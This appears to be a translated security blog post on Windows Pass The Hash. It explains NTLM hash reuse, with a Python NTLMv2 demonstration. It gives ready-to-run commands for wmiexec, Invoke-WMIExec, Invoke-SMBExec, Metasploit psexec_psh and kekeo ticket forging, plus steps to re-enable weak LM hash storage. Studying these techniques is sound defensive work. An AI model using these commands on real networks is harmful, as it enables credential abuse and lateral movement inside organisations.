0x00 Preface
---
In the previous article 'Domain Penetration - Pass The Hash & Pass The Key', the impact of kb2871997 on Pass The Hash was introduced. This article approaches the topic from another angle and introduces the tools that implement Pass The Hash.
0x01 Introduction
---
This article will cover the following topics:
- Principles of Pass The Hash
- Common Tools
- Pass The Hash in mimikatz
- Pass The Ticket in mimikatz
0x02 Principles of Pass The Hash
---
Refer to the introduction on Wikipedia, available at:
https://en.wikipedia.org/wiki/Pass_the_hash
Extract key information:
- In Windows systems, NTLM authentication is typically used.
- NTLM authentication does not use the plaintext password; it uses a hash derived from the password, which the system generates through APIs such as LsaLogonUser.
- Hashes are divided into LM hash and NT hash. If the password length exceeds 15 characters, LM hash cannot be generated. Starting from Windows Vista and Windows Server 2008, Microsoft disabled LM hash by default.
- If an attacker obtains the hash, they can impersonate the user during authentication (i.e., bypass the process of calling the API to generate the hash).
Note:
mimikatz supports extracting LM hash from memory, but only if the Windows system supports LM hash.
Method to enable LM hash on Windows Server 2008:
gpedit.msc → Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options
Find 'Network security: Do not store LAN Manager hash value on next password change' and select 'Disabled'.
After the system changes the password next time, LM hash can be extracted.
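To make the principle above concrete, here is an added example (not code from the original article) that builds the NT hash and then runs an NTLMv2 exchange in which the client side only ever holds the hash, while the server verifies with the same stored hash. It follows the MS-NLMP definitions (NT hash = MD4 of the UTF-16LE password; NTOWFv2 = HMAC-MD5 over the uppercased user name plus domain; NTProofStr = HMAC-MD5 over server challenge plus the client blob). MD4 is implemented in pure Python because OpenSSL 3 builds often do not expose it through hashlib. The user and domain reuse the article's test1 / test.local; the password, challenges, timestamp and target-info bytes are constructed for the demo.

```python
# Added example, not from the original article: why an NT hash is a
# password-equivalent under NTLM. The client never needs the plaintext password,
# only the NT hash, and the server checks the response with the same hash.
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 digest (RFC 1320), pure Python because hashlib may lack md4."""
    def rot(x, n):
        return ((x << n) | (x >> (32 - n))) & _MASK

    f = lambda x, y, z: (x & y) | (~x & _MASK & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    # Pad to 56 bytes mod 64, then append the bit length little-endian.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rot((a + fn(b, c, d) + x[k] + const) & _MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates "d"
        state = [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the value stored in the SAM/NTDS."""
    return md4(password.encode("utf-16-le"))


def _response_key(nthash: bytes, user: str, domain: str) -> bytes:
    # NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain.
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def client_ntlmv2_response(nthash, user, domain, server_challenge, client_challenge,
                           timestamp, target_info) -> bytes:
    """Build NtChallengeResponse from the hash alone; no password is involved."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    proof = hmac.new(_response_key(nthash, user, domain), server_challenge + temp,
                     hashlib.md5).digest()
    return proof + temp


def server_verify(stored_nthash, user, domain, server_challenge, nt_challenge_response) -> bool:
    """What the authenticating server does: recompute the proof from its stored hash."""
    proof, temp = nt_challenge_response[:16], nt_challenge_response[16:]
    expected = hmac.new(_response_key(stored_nthash, user, domain), server_challenge + temp,
                        hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def demo(user="test1", domain="test.local", password="Winter2017!") -> tuple:
    """Returns (accepted when the client holds only the hash, accepted after tampering)."""
    stored = nt_hash(password)                   # what the server/DC stores
    hash_only = bytes(stored)                    # a copy of the hash, password unknown
    server_challenge = bytes(range(8))           # constructed
    client_challenge = bytes(range(8, 16))       # constructed
    timestamp = 0x01D3C8C4A8A0B9C0               # constructed FILETIME
    target_info = (b"\x02\x00\x08\x00" + "TEST".encode("utf-16-le")  # constructed AV pair
                   + b"\x00\x00\x00\x00")                            # MsvAvEOL
    resp = client_ntlmv2_response(hash_only, user, domain, server_challenge,
                                  client_challenge, timestamp, target_info)
    ok = server_verify(stored, user, domain, server_challenge, resp)
    tampered = bytes([resp[0] ^ 0x01]) + resp[1:]
    return ok, server_verify(stored, user, domain, server_challenge, tampered)


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("hash-only client accepted / tampered accepted:", demo())
```

The point the exchange makes is the one in the bullet list: because the server only ever compares HMACs keyed by the stored hash, anyone holding that hash can produce a valid response without calling the password-to-hash API at all. That is why protecting the hash (Credential Guard, Protected Users, LSA protection, no LM storage) matters as much as protecting the password.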
0x03 Common Tools
---
When we obtain a user's password hash and are limited to not cracking the plaintext password, what tools can be used for Pass The Hash?
1. Tools in Kali
(1) meterpreter
```
use exploit/windows/smb/psexec_psh
```
(2) Toolkit
Located under Password Attacks - Passing the Hash, as shown in the figure below

Includes various exploitation tools
2. Tools for Windows systems
(1) python
wmiexec:
Reference address:
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
EXE version download address:
https://github.com/maaaaz/impacket-examples-windows
Note:
The comment in wmiexec.py states "Main advantage here is it runs under the user (has to be Admin) account", but in testing, regular user permissions were sufficient.
Parameter example:
```
wmiexec -hashes 00000000000000000000000000000000:7ECFFFF0C3548187607A14BAD0F88BB1 TEST/[email protected] "whoami"
```
The hash parameter format for wmiexec.py is LMHASH:NTHASH. Since this hash comes from Server 2008, which does not support LM hash by default, the LM hash can be set to any value.
(2) powershell
Reference URL:
https://github.com/Kevin-Robertson/Invoke-TheHash/
Supports multiple methods
Invoke-WMIExec:
Parameter example:
```
Invoke-WMIExec -Target 192.168.1.1 -Domain test.local -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe" -verbose
```
Similar to wmiexec.py
Invoke-SMBExec:
Supports SMB1, SMB2 (2.1), and SMB signing
Parameter example:
```
Invoke-SMBExec -Target 192.168.0.2 -Domain test.local -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe" -verbose
```
It executes the command by creating a service on the target host, so the command runs with SYSTEM privileges.
Invoke-SMBClient:
Supports SMB1, SMB2 (2.1), and SMB signing
If you only have permissions on SMB file shares and no remote execution permission, this script can be used.
Supported operations include listing directories, uploading files, downloading files and deleting files (what is actually allowed depends on the permissions of the account whose hash is used).
(3) mimikatz
Pass-The-Hash:
Actually Overpass-the-hash
Parameter example:
```
privilege::debug
```
Note:
The pth function of mimikatz requires local administrator privileges. This is determined by its implementation: it first has to read information from the high-privilege process lsass.exe.
On Windows 8.1/2012 R2, and on Windows 7/2008 R2/8/2012 with patch kb2871997 installed, AES keys can be used instead of the NT hash.
Pass-The-Ticket:
Considering that mimikatz's Pass-The-Hash feature requires local administrator privileges, mimikatz also provides a solution that does not require administrator privileges: Pass-The-Ticket.
Pass-The-Ticket requires another open-source tool by gentilkiwi, kekeo, available at:
https://github.com/gentilkiwi/kekeo
Parameter example:
```
kekeo "tgt::ask /user:test1 /domain:test.local /ntlm:7ECFFFF0C3548187607A14BAD0F88BB1"
```
After execution, the ticket [email protected][email protected] is generated.
Next, import the ticket:
```
kekeo "kerberos::ptt [email protected][email protected]"
```
0x04 Summary
---
This article lists various tools for implementing Pass The Hash; contributions are welcome.